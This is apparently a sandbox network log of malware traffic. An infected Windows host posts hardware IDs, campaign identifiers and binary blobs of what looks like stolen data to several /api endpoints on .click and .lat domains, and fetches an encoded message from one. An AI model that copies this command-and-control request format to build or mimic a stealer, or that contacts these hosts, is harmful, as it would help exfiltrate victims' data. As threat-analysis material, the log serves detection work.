Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.6	50396	172.67.180.113	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:43 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4O128N7AW5PR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12825 Host: treehoneyi.click
2024-12-19 09:14:43 UTC	12825	OUT	Data Raw: 2d 2d 34 4f 31 32 38 4e 37 41 57 35 50 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 4f 31 32 38 4e 37 41 57 35 50 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 4f 31 32 38 4e 37 41 57 35 50 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 53 75 70 70 6f 72 74 0d 0a 2d 2d 34 4f 31 32 38 4e 37 41 57 35 50 52 Data Ascii: --4O128N7AW5PRContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--4O128N7AW5PRContent-Disposition: form-data; name="pid"2--4O128N7AW5PRContent-Disposition: form-data; name="lid"rAGxSF--Support--4O128N7AW5PR
2024-12-19 09:14:57 UTC	1120	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d9nm57mbp0q06aek8fq6tdajnu; expires=Mon, 14 Apr 2025 03:01:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gg30EmgqyaGZhhhQKNMHsk8iIV5pkyHfFQTOu95C07g6FHnOXeKKDSzLJXDwFeCaJ7T5Zk1Sv0GINOYIrRZDArupUCLCtwMOdf1JZETiDBD64XNEDVoyQ5fcnIQJBMELFmvi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4648b5fd3e42e2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1606&rtt_var=612&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13759&delivery_rate=1773997&cwnd=187&unsent_bytes=0&cid=ed20f3aa9a89c63a&ts=14059&x=0"
2024-12-19 09:14:57 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:14:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.6	50400	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:51 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9WSO0CV8Y0JPFXA2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1252 Host: grannyejh.lat
2024-12-19 09:14:51 UTC	1252	OUT	Data Raw: 2d 2d 39 57 53 4f 30 43 56 38 59 30 4a 50 46 58 41 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 57 53 4f 30 43 56 38 59 30 4a 50 46 58 41 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 57 53 4f 30 43 56 38 59 30 4a 50 46 58 41 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 39 57 Data Ascii: --9WSO0CV8Y0JPFXA2Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--9WSO0CV8Y0JPFXA2Content-Disposition: form-data; name="pid"1--9WSO0CV8Y0JPFXA2Content-Disposition: form-data; name="lid"PsFKDg--pablo--9W
2024-12-19 09:15:05 UTC	1122	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:15:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d317rpjmeecjje5li18udkbgt7; expires=Mon, 14 Apr 2025 03:01:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jVrHWFoLxji0y1TN3cMe9deEWfoJQH%2BTgrSQwZhv0jRtiR%2BWxt%2FUyp8P8emwK4mPPSyHv0YIWDxxrEUcVOOe8e2w8kNLpmiW2VJ2YlorptlpVrROV3nlz2bWL%2FxpvLtW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4648eb48796a59-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2330&min_rtt=2326&rtt_var=881&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=2164&delivery_rate=1236240&cwnd=246&unsent_bytes=0&cid=4ceaaf783d2e987d&ts=13921&x=0"
2024-12-19 09:15:05 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:15:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.6	50412	172.67.180.113	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:58 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ZZ6B13MT23KO3Q37P User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15101 Host: treehoneyi.click
2024-12-19 09:14:58 UTC	15101	OUT	Data Raw: 2d 2d 5a 5a 36 42 31 33 4d 54 32 33 4b 4f 33 51 33 37 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 5a 36 42 31 33 4d 54 32 33 4b 4f 33 51 33 37 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 5a 36 42 31 33 4d 54 32 33 4b 4f 33 51 33 37 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 53 75 70 70 6f 72 74 0d Data Ascii: --ZZ6B13MT23KO3Q37PContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--ZZ6B13MT23KO3Q37PContent-Disposition: form-data; name="pid"2--ZZ6B13MT23KO3Q37PContent-Disposition: form-data; name="lid"rAGxSF--Support
2024-12-19 09:15:12 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:15:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4r6p1umcferlqfpf27619h8t6v; expires=Mon, 14 Apr 2025 03:01:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PR5r5u7EPY3kSxcXKANQSK3zE7SY3uNTb6u8N1FKDF4wCWQRdmo3QtESFIctziRiVKH2y%2B2e%2FrdzA%2FOA%2BwxDSSwzj1N8MR15pXANIt5IcV1sfzBVN%2BNBHHGf1o20%2BGm3zuMl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464914ec5d0f60-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1646&rtt_var=623&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=16040&delivery_rate=1749550&cwnd=211&unsent_bytes=0&cid=c321e3903ff9c3de&ts=13546&x=0"
2024-12-19 09:15:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:15:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.6	50413	104.21.23.76	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:58 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5WAL4FGDKYL6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 29532 Host: pancakedipyps.click
2024-12-19 09:14:58 UTC	15331	OUT	Data Raw: 2d 2d 35 57 41 4c 34 46 47 44 4b 59 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 57 41 4c 34 46 47 44 4b 59 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 57 41 4c 34 46 47 44 4b 59 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 35 57 41 4c 34 46 47 44 4b 59 4c 36 0d 0a 43 Data Ascii: --5WAL4FGDKYL6Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--5WAL4FGDKYL6Content-Disposition: form-data; name="pid"1--5WAL4FGDKYL6Content-Disposition: form-data; name="lid"FATE99--test--5WAL4FGDKYL6C
2024-12-19 09:14:58 UTC	14201	OUT	Data Raw: 6f 0d 37 33 24 7c f5 12 29 1e 50 51 4b c2 da c6 6e f9 6d 37 3e ba 07 00 b9 05 ae d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f 15 6f 5e 8a 52 eb 8f 3d 5a b5 1b 48 4d 79 64 30 cc 8f f2 84 31 cb 5f 31 6d fe 58 5d 72 1b 54 9a b4 da cf Data Ascii: o73$\|)PQKnm7>5OEK?6V,i<0egW\ro`#R\\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_\|x5mDom;z/o^R=ZHMyd01_1mX]rT
2024-12-19 09:15:14 UTC	1131	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:15:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0u7kpijapmhd5li8o5qh7cvvef; expires=Mon, 14 Apr 2025 03:01:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SQHmBbG24t%2FoDlk5O1578nVSs0StYhvpZqvRh5ZqwaWyrurtRcodpRIwTJg2plSPRRcszq9IKAN1M9vck5frKyu4JI%2BHUEGZzDIaDQ8ihfWsntjaBasYWwc%2Fd0YdrPwlCRJMUSrr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46491679707c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1962&min_rtt=1955&rtt_var=747&sent=20&recv=36&lost=0&retrans=0&sent_bytes=2848&recv_bytes=30513&delivery_rate=1452013&cwnd=252&unsent_bytes=0&cid=e47e0345952b4c9b&ts=15433&x=0"
2024-12-19 09:15:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:15:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.6	50418	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:15:07 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=UF0TPR7BH3DAJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 29542 Host: grannyejh.lat
2024-12-19 09:15:07 UTC	15331	OUT	Data Raw: 2d 2d 55 46 30 54 50 52 37 42 48 33 44 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 46 30 54 50 52 37 42 48 33 44 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 46 30 54 50 52 37 42 48 33 44 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 55 46 30 54 50 52 37 42 48 33 44 Data Ascii: --UF0TPR7BH3DAJContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--UF0TPR7BH3DAJContent-Disposition: form-data; name="pid"1--UF0TPR7BH3DAJContent-Disposition: form-data; name="lid"PsFKDg--pablo--UF0TPR7BH3D
2024-12-19 09:15:07 UTC	14211	OUT	Data Raw: a4 a2 be b7 6e dc 5a 89 c9 6f 0d 37 33 24 7c f5 12 29 1e 50 51 4b c2 da c6 6e f9 6d 37 3e ba 07 00 b9 05 ae d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f 15 6f 5e 8a 52 eb 8f 3d 5a b5 1b 48 4d 79 64 30 cc 8f f2 84 31 cb 5f 31 6d fe Data Ascii: nZo73$\|)PQKnm7>5OEK?6V,i<0egW\ro`#R\\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_\|x5mDom;z/o^R=ZHMyd01_1m
2024-12-19 09:15:21 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:15:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a7088p888nmvjtkjp4hp1jarag; expires=Mon, 14 Apr 2025 03:01:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=60eYL2%2BTi%2FsFc%2BSamNQKbsnXRdhFrbegg%2Bl80Mz1Jqd3tOp%2BvzuEqaChaQ4yBjTU5Gjbuezlfd%2Fc2Mfw18WTUFAElzHOZeU1OH3j%2FBzjjP%2FMiUUGVsUU7TQhgK6SsN9v"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46494aaab7422d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2362&min_rtt=2320&rtt_var=900&sent=17&recv=33&lost=0&retrans=0&sent_bytes=2830&recv_bytes=30518&delivery_rate=1258620&cwnd=232&unsent_bytes=0&cid=88b7c0537a1f1754&ts=14737&x=0"
2024-12-19 09:15:21 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:15:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.6	50421	172.67.180.113	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:15:13 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=24N0BW74PY4SAZBUWN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19965 Host: treehoneyi.click
2024-12-19 09:15:13 UTC	15331	OUT	Data Raw: 2d 2d 32 34 4e 30 42 57 37 34 50 59 34 53 41 5a 42 55 57 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 34 4e 30 42 57 37 34 50 59 34 53 41 5a 42 55 57 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 34 4e 30 42 57 37 34 50 59 34 53 41 5a 42 55 57 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 53 75 70 70 6f Data Ascii: --24N0BW74PY4SAZBUWNContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--24N0BW74PY4SAZBUWNContent-Disposition: form-data; name="pid"3--24N0BW74PY4SAZBUWNContent-Disposition: form-data; name="lid"rAGxSF--Suppo
2024-12-19 09:15:13 UTC	4634	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de Data Ascii: +?2+?2+?o?Mp5p_
2024-12-19 09:15:27 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:15:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6ofk43ngqe3ki8sno1ip6in013; expires=Mon, 14 Apr 2025 03:01:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kg4jKMjhvcdFcTOSu7tr%2BeakPq4oY0%2BLD91C%2Fw2ZO7TJczs1iPe4hF0kGmHsyE31rBXu2Gt3zaqs3oRITthpxDCPQO414NRFHGS7zCXC4kG3CHgaJaDeurXybYr7fl8Ic8A5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4649725a4a42aa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1599&rtt_var=604&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2840&recv_bytes=20927&delivery_rate=1826141&cwnd=195&unsent_bytes=0&cid=95f7cf8fa74e257b&ts=14458&x=0"
2024-12-19 09:15:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:15:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.6	50422	104.21.23.76	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:15:15 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 81 Host: pancakedipyps.click
2024-12-19 09:15:15 UTC	81	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=86648A4BEF1E4DA3AC8923850305D13E
2024-12-19 09:15:29 UTC	1131	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:15:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c3u8uhmbs9jqova86crvbq941l; expires=Mon, 14 Apr 2025 03:01:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aFHYEsVLDsAD0HNr0mctClZFOJbSL1P8CRU1X2FcKdmfCT%2B69NAqv6pH0juwIbl%2FCheSY%2FDLKvSOCGMEffuGSmD974gzRYWnSgN5d%2B5TEEUgntx4dZNCZo5o2M%2FOQG23TTdC3JZY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46497f3c6d41df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1722&rtt_var=651&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=984&delivery_rate=1675272&cwnd=252&unsent_bytes=0&cid=af12d7d08202a7c7&ts=14118&x=0"
2024-12-19 09:15:29 UTC	54	IN	Data Raw: 33 30 0d 0a 74 50 36 54 32 48 33 48 6c 2f 4e 76 51 7a 51 55 77 78 51 2b 38 58 42 53 51 50 37 49 57 6f 48 36 66 65 2f 33 72 69 4c 5a 2b 56 6e 76 6f 77 3d 3d 0d 0a Data Ascii: 30tP6T2H3Hl/NvQzQUwxQ+8XBSQP7IWoH6fe/3riLZ+Vnvow==
